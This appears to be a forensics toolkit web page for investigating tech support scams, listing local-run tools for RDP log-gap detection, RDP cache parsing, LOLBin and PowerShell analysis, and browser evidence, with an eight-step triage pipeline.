// case type
tech support scam
pop-up → call center → remote-access install → gift-card / wire payout. evidence is RDP / RMM tooling and the call recording / payment.
start here · primary tools
ordered. work top-down. the first tool is the suggested entry point for this case type.
- remote desktop log clearing and gap detectordrop rdp evtx csvs · detect rdp session log gaps · identify rdp channel clearing · surface rdp session reconstruction with cleared log indicators · runs locally
- rdp cache parserdrop .bmc/.bin cache files · RDP8 magic or legacy BGRA tiles · thumbnail grid · hide uniform tiles · export zip · runs locally
- live response tool execution artifact detectordrop prefetch shimcache amcache or 4688 evtx csv · detect live response and triage collection tool execution · identify when and how live response was performed · surface kape triage collector and incident response tool artifacts · runs locally
- LOLBin execution burst detectordrop 4688 or sysmon evtx csv · detect living off the land binary execution · identify lolbin abuse patterns · surface unusual lolbin invocations and burst usage · runs locally
- browser history extractordrop a Chrome or Firefox SQLite history DB · extract URLs · visit counts · timestamps · typed URLs · export CSV · runs locally
- browser extension analyzerdrop Chrome or Firefox extension folder or .crx · parse manifest · permissions · background scripts · content scripts · flag dangerous permissions · export report · runs locally
- chrome extension analyzerdrop crx or manifest.json · permissions audit · content scripts · risk score · script patterns · runs locally
- powershell deobfuscatorpaste obfuscated powershell · base64 utf-16 · deflate gzip · concat replace · char arrays · multi-pass · iocs · runs locally
also useful · secondary tools
supporting and follow-up tools. surface as the investigation widens.
- PowerShell history clearing detectordrop powershell operational evtx csv or psreadline history file · detect cleared powershell command history · identify gaps in command execution record · surface anti-forensic powershell history manipulation · runs locally
- psreadline history gap and anomaly analyzerpaste or drop psreadline consolehost_history txt · detect gaps in command history · identify suspicious command sequences · surface anti-forensic commands · reconstruct powershell session timeline · runs locally
- windows scheduled task analyzerdrop task scheduler xml · triggers · actions · principals · suspicion score · encoded powershell decode · persistence hints · runs locally
- case report generatorfill in case number · examiner · dates · findings · drop evidence files for auto hash · generates structured forensic report PDF · runs locally
run as a stack
skip the click-through. these presets are curated forensic pipelines you can save as a stack with one click and run on your evidence locally.
tech support scam — triage kit
8 stepsdrop RDP / RMM logs + browser history → remote-access clearing detect → lolbin burst → PS deobfuscate → report
- 01evidence-manifest-generatorhash endpoint exports before triage
- 02remote-desktop-log-clearing-detectordetect RDP log clearing — common post-scam cleanup
- 03rdp-cache-parserparse RDP bitmap cache for remote session evidence
- 04live-response-tool-execution-detectordetect RMM / live-response tool execution artifacts
- 05lolbin-execution-burst-detectorflag lolbin execution bursts during the scam session window
- 06powershell-deobfuscatordeobfuscate PowerShell payloads dropped by the scammer
- 07browser-history-clearing-pattern-detectordetect browser history clearing after the remote session
- 08case-report-generatordraft a report documenting remote-access evidence + cleanup indicators